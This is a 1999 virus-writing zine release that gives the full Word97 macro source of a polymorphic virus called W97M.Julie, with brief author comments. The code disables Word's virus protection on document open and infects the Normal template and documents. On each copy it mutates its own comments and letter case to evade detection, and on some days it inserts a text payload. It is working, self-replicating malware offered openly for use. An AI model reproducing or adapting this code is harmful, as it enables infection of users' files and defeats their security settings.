<-------------------------//LineZer0 Network 99\\------------------------->
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=


~Word97ClassMacro.Julie~
========================

Identification:
~~~~~~~~~~~~~~~

	~Virusname: 	W97M.Julie
	~Size:		31.184 Bytes ( 1 Classobject )
	~Version:	A
	~Origin:  	Austria
	~Author:	jack twoflower / LineZer0 & Metaphase
	~Date:		June, 1999

Features:
~~~~~~~

	~Application	Word97
	~Payload: 	Yup
	~Stealth: 	Nope
	~Retro: 	Nope
	~SR-1 comp.: 	Yup
	~Polymorph:	Yup, 'bliem' engine ;)
	~Encrypted: 	Nope

    Hi folks, this one is the first virus which uses such an engine as the
'bliem' engine. So if you want to have a full commented source please take
a look in the articles section for the 'bliem' engine...

   Ehm, there is only one change in this engine...it changes with ucase and
lcase...

------------------------> code starts here <------------------------------

Private Sub document_open() '
Dim v(150): Options.VirusProtection = (Rnd * 0) '
SetAttr NormalTemplate.FullName, vbNormal '
Set a = MacroContainer.VBProject: Set ab = a.VBComponents(1) '
Set abc = ab.CodeModule: Set s = NormalTemplate: t = Chr(39) '
Set nh = s.VBProject.VBComponents(1).CodeModule '
For y = 1 To Int(75 - (Rnd * 20)): vx = vx & Chr(255 - Int(Rnd * 100)): Next y '
vc = "Private Sub document_close()" & t & vx & vbCr  '
If MacroContainer = NormalTemplate Then '
Set s = ActiveDocument: Set nh = s.VBProject.VBComponents(1).CodeModule '
vc = "Private Sub document_open()" & t & vx & vbCr '
End If: lin = abc.countoflines '
For i = 2 To lin '
jc = "": d = Int(Rnd * 3): p = InStr(abc.Lines(i, 1), t) '
If p = 0 Then GoTo e_ '
If p = 1 And lin > 100 Then '
d = 1: GoTo n_ '
End If '

> here the new thingy starts...

l = UCase(Left(abc.Lines(i, 1), (p - 1))) '
For o = 1 To Len(l) '
f = Mid(l, o, 1) '
If Asc(f) < 90 And Asc(f) > 65 Then f = Chr(Asc(f) + Int(Rnd * 2) * 32) '
v(i) = v(i) & f '

> this one is taken from 'selftextpolymorphism'. thanks a lot...

Next o '
For j = 1 To Int(75 - (Rnd * 20))  '
jc = jc & Chr(255 - Int(Rnd * 100)) '
Next j '
v(i) = v(i) & t & jc '
If d = 2 Then v(i) = v(i) & vbCr & t & jc '
vc = vc & v(i) & vbCr '
n_: '
Next i '
e_: '
If nh.countoflines < (1 + 1) Then '
nh.addfromstring vc: s.Save '
End If '
If Day(Now()) = (25 + Int(Rnd * 6)) Then Selection.InsertAfter "l0 julie, wassup?" '
End Sub '
Rem Class97Macro.julie - dedicated to julie ;) '
Rem Another virus by jack twoflower [LineZero & Metaphase] '

----------------------> code ends here <-----------------------------------

    Hope you like this whole thing. It took me a bit to code this baby. 
Also, not forget, this here is dedicated to Julie, who will be my girl in 
the next time...(hopefully...;))

Have phun,					jack twoflower 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
<-------------------------\\LineZer0 Network 99//------------------------->
